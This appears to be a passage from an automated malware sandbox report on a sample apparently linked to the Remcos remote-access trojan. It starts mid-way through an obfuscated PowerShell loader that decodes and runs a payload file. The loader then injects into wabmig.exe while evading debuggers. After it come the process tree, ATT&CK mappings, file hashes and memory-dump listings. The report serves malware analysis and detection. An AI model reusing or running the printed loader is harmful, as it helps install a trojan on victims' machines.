ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1944
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Financiered.adv && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1404
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
80e02be6ea83d1bb7db250bd7db8951e

SHA1
3a1955ca4e86bd8c9e53163c94ae2bce35e5a849

SHA256
d1a95b0ad34b090a7bdc44d056289477509b4bbdaa8b4588e4a8fcb653414874

SHA512
59db5fd3a4d64da65e5b04f7fcee451fe3a1d243c6867e1e89400d3362764fae78341d0a643882cf016f3befeb302ddbe69b359b1b66959f9e0c3c42e9775507

Download Submit
C:\Users\Admin\AppData\Roaming\Financiered.adv

Filesize
473KB

MD5
2a226c84235f25cf9bee2bade90f7fc9

SHA1
c449226b64715a81000c566e37677b25953a7e4a

SHA256
d18add82262d9ddf210db5843c8a35b049e7d150c204bf22a77e9bd546f7eda3

SHA512
e57f9f378a53ab77e7306efb81aa806462353121ea3b0a4c8ae7549be1bdf00ea224d1f20e10956ba31cc8b6c63264193f6c2dfdf7e958747d8aa26cc0008be7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZX49J2LLI6U0P7Z7K7DM.temp

Filesize
7KB

MD5
ab181ddd4af9a3b464153cb492d459fb

SHA1
4fb98373dacf9c0ae538c85fb5b8c0bc8d1b3a2a

SHA256
b36aaf59f1e0dacc8282225c06a048f9265613dea38fb93d04478840994cb295

SHA512
7d86c23dfa14c6af53f32045413defbc0ac0f38f06514567ab3728b28516866aff40a21aa241d3dde970b690948ada008086be98bfe0a3cbbf38a3b80e29f15e

Download Submit
memory/1944-18-0x00000000066B0000-0x0000000009B94000-memory.dmp

Filesize
52.9MB

Download
memory/2288-13-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/2288-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2288-10-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2288-12-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2288-4-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/2288-8-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2288-7-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2288-9-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2288-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2288-46-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2672-44-0x0000000000E40000-0x0000000001EA2000-memory.dmp

Filesize
16.4MB

Download
memory/2672-21-0x0000000000E40000-0x0000000001EA2000-memory.dmp

Filesize
16.4MB

Download
memory/2672-45-0x0000000001EB0000-0x0000000005394000-memory.dmp

Filesize
52.9MB

Download
memory/2672-19-0x0000000001EB0000-0x0000000005394000-memory.dmp

Filesize
52.9MB

Download

Analysis

Sharing